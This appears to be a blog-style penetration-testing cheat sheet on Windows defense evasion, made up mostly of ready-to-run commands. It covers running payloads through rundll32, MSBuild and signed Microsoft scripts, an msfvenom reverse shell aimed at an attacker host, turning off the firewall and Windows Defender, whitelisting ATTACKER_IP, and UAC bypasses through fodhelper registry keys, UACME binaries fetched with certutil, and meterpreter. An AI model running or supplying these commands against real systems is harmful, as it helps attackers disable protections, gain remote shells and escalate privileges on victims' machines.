Execution
If you cannot execute an exe file, try these options:
- Execute a HTA shell
- Execut it as a DLL
msfvenom -p windows/exec -f dll CMD=calc.exe -o calc.dllC:\rundll32.exe calc.dll,doesntmatterhere
- Rename a .exe into a screen saver .src file and execute it via rundll:
copy payload.exe p.scr
C:\Windows\system32\rundll32.exe desk.cpl,InstallScreenSaver p.scr - Use nested executions through trusted applications:
C:\payload.exe
C:\Windows\system32\cmd.exe /c C:\payload.exe
C:\Windows\system32\cmd.exe /c cscript.exe \windows\system32\SyncAppvPublishingServer.vbs ".;Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL payload.exe'[ -Verb RunAs]" // With the last argument, a UAC dialog pops up, but with blue color because the program to execute was signed by Microsoft. - Try to execute (one-liner) scripts which runs interepreted code or can create new processes.
- Use MSBuild.exe.
- Use this CSharp template.
- Add C# code in the code section.
- Or:
msfvenom -p windows/shell_reverse_tcp LHOST=$attacker LPORT=80 -f csharp
- Or:
- Execute it on the target with msbuild.exe file.xml.
- Tip: Code could be downloaded remotely:
<Code Type="Class" Language="cs" Source="\10.10.10.10\bla.cs>
C:\windows\system32\cmd.exeis blocked? TryC:\windows\SysWOW64\cmd.exe!- Powershell.exe is blocked?
C:\Windows\SysWOW64\WindowsPowerShell\...\powershell.exeC:\Windows\sysnative\WindowsPowerShell\...\powershell.exe
Windows firewall / netsh
Check firewall state
netsh advfirewall show currentprofile netsh advfirewall show state
If the firewall is active, list the configuration:
netsh advfirewall show config
Example how to add exceptions into the firewall via the command line from an administrator:
C:\Windows\temp> netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
or
Netsh Advfirewall show allprofiles NetSh Advfirewall set allprofiles state off
or whitelist the own ip
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
Open a port:
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=$localWindowsIp localport=2222 action=allow
Windows Defender
Detect if the Defender is active:
sc query windefend
Deactivate Windows Defender:
sc config WinDefend start= disabled sc stop WinDefend
Same thing in PowerShell:
Get-MpComputerStatus Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableIOAVProtection $true Get-MpComputerStatus
UAC User Account Control
See Windows security fundamentels for more information
Another UAC bypass with fodhelper.exe. In a (admin) cmd:
- Add an empty key which will fodhelper bring to go to an alternative key (the next one).
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ - Set registry key which fodhelper exe will access as alternative.
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f - Open C:\Windows\System32\fodhelper.exe
UACME
~70 methods to bypass UAC in a single binary. Check it out directly in Visual Studio. Remove the macro #KUMA_STUB in global.h. Then, build it.
certutil.exe -urlcache -split -f "http://$NTPSRV/Akagi32.exe" Akagi32.exe
Akagi32.exe 31 cmd.exe
certutil.exe -urlcache -split -f "http://$NTPSRV/Akagi64.exe" Akagi64.exe
Akagi64.exe 61 cmd.exe
Try various IDs. The Github page has a (collapsed) list of all bypassing methods.
SDCLC bypass
- Open a session in meterpreter. Background the session.
- Use windows/local/bypassuac_sdclt and set the backgrounded session and run the bypass.
Leave a Reply
You must be logged in to post a comment.